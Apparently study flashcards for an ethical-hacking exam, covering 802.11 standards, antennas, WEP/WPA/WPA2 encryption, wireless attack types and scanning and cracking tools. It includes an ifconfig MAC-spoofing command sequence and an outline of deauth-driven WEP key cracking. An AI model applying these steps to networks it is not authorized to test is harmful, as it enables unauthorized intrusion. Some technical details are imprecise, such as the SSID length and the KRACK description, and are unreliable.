Wireless Network Hacking Flashcards
802.11 series of wireless standards
- 11a 54 Mbps, 5GHZ, OFDM modulation
- 11b 11 Mbps, 2.4GHZ, DSSS modulation
- 11d variations of a and b
- 11e Quality of Service
- 11g 54 Mbps, 2.4GHZ, OFDM and DSSS modulation
- 11i WPA/WPA2 encryption standards
- 11n 100+Mbps, 2.4-5 GHZ, OFDM modulation
- 11ac 1000 Mbps, 5 GHZ, QAM modulatio
Other wireless standards
- 15.1 Bluetooth
- 15.4 Zigbee - low power, low data rate, close proximity ad hoc network
- 16 Wimax - 40 Mbps, wireless metropolitan area network
Orthogonal Frequency Division Multiplexing (OFDM)
Transmissions media is divided into a series of frequency bands that don’t overlap each other and each can be used to carry a separate signal.
Direct Sequence Spread Spectrum (DSSS)
Is a transmission technology used in local area wireless network transmissions. In this technology, a data signal at the sending station is combined with a high data rate bit sequence, which divides user data based on a spreading ratio. The benefits of using DSSS are resistance to jamming, sharing single channels among multiple users, less background noise and relative timing between transmitter and receivers.
Wireless - Ad-hoc mode
System to system such as two computers.
Wireless - Infrastructure mode
Makes use of a wireless access point (WAP). Clients need to associate with a WAP and disassociate to connect to a different WAP. With a single WAP you have a basic service area (BSA). Communication between this single WAP and its clients is known as a basic service set. If you have multiple WAPs, then you have an extended service set (ESS). Roaming involves clients disassociating from one WAP and associating with another WAP within the ESS.
Basic Service Set Identifier (BSSID)
The MAC address of the wireless access point at the center of the basic service set (BSS).
Wireless omnidirectional antennae
Signal emanates from the source in 360 degrees. Dipole antennas are omnidirectional.
Unidirectional antennae
Allows you to focus the signal in a specific direction. Yagi antennas are unidirectional. Greatly increases signal strength and distance. Parabolic grid antennas are unidirectional and work like a satellite dish. Loop antennas are also unidirectional.
Cantennae
Antenna made from a pringles can
Service Set Identifier (SSID)
A case sensitive text word that is 32 characters in length that identifies a wireless network. SSIDs are broadcast by default but can be hidden by choosing not to broadcast (SSID cloaking).
Open Systems Authentication
No authentication performed by a WAP of the client
Shared Key Authentication
The wireless client participates in a challenge/response authentication with the AP verifying a decrypted key.
War Chalking
Drawing symbols in public areas to indicate open WAPs.
)( indicates an open network, adding a key means it is locked
$ indicates pay for access
W - WEP enabled
Wired Equivalent Privacy (WEP)
Uses 40-232 bit keys 64 bit version uses a 40 bit key 128 bit version uses a 104 bit key 256 bit version uses a 232 bit key Uses RC4 Uses a 24 bit initialization vector Calculates a 32 bit integrity check value (ICV) Easy to crack because attackers can generate enough packets to analyze the IVs and arrive at the key used. Attackers can force dissociation from clients to generate the number of packets needed to analyze for cracking the WEP key.
Wi-Fi Protected Access (WPA)
WPA uses Temporal Key Integrity Protocol (TKIP), a 128 bit key and the client’s MAC address for encryption. WPA changes the key every 10,000 packets. Keys are exchanged using the Extensible Authentication Protocol (EAP) which uses a four way handshake
WPA2
Similar to WPA
WPA2 Personal - uses a preshared key
WPA2 Enterprise - uses Radius for authentication
Uses AES for encryption to ensure FIPS 140-2 compliance
Uses Cipher Block Chaining Message Authentication Code (CCMP) for integrity. CCMP calls them message integrity codes (MICs) and the process is called cipher block chaining message authentication code (CBC-MAC)
Wireless Security Standards
WEP: RC4, 24 Bit IV, 40-232 bit key, CRC-32
WPA: RC4+TKIP, 48 bit IV, 128 bit key, Michael Algorithm+CRC-32
WPA2: AES-CCMP, 48 bit IV, 128 bit key, CBC-MAC(CCMP)
Wireless Threats
- Access Control attacks
- Integrity attacks
- Confidentiality attacks
- Availability attacks
- Authentication attacks
Locate wireless networks
WIGLE, Netstumbler, WifiExplorer, WiFiFoFum, OpenSignalMaps, Wifinder, Kismet, (works by channel hopping and can sniff packets and save them to a log file for viewing by wireshark or tcpdump), Netsurveyor, WeFi, Skyhook
AirPCap
USB wireless adapter used for wireless hacking. Works with Aircrack-ng, AirPcapReplay
Wireless Attacks
Rogue Access Point
Evil Twin - set to the same SSID as a legitimate WAP. AKA as a mis-association attack. Faking a well known AP is referred to as a honeyspot attack.
Ad-hoc connection attack
Jam a wireless signal
MAC spoofing - in case a MAC filter is enabled on a WAP, easily done on a Linux machine:
1. ifconfig wlan0 down
2. ifconfig wlan0 hw ether AA:BB:CC:DD:EE:FF
3. ifconfig wlan0 up
Wireless Encryption Attack
- Start a WiFi adapter and ensure it can both sniff and inject packets
- Start a sniffer
- Use de-auth to force the creation of thousands of wireless packets
4 Analyze the packets
Aircrack may use a dictionary attack for brute force cracking WPA and WPA2.
Cain and Abel can sniff wireless packets and crack also, KisMAC (for Mac OS) can brute force WEP or WPA passwords.
WEPAttack,
WEPCrack,
Portable Penetrator,
Elcomsoft’s Wireless Security Auditor tool
Key Re-installation Attack (KRACK)
A replay attack that takes advantage of how WPA2 works. By repeatedly resetting and replaying a portion of traffic, the attacker can eventually learn the full key to encrypt all traffic. An attacker can repeatedly resend the third handshake of another device’s session to manipulate or reset the WPA2 encryption key.
Wireless Sniffing tools
NetStumbler, Kismet, OmniPeek, AirMagnet WiFi Analyzer Pro, WiFi Pilot
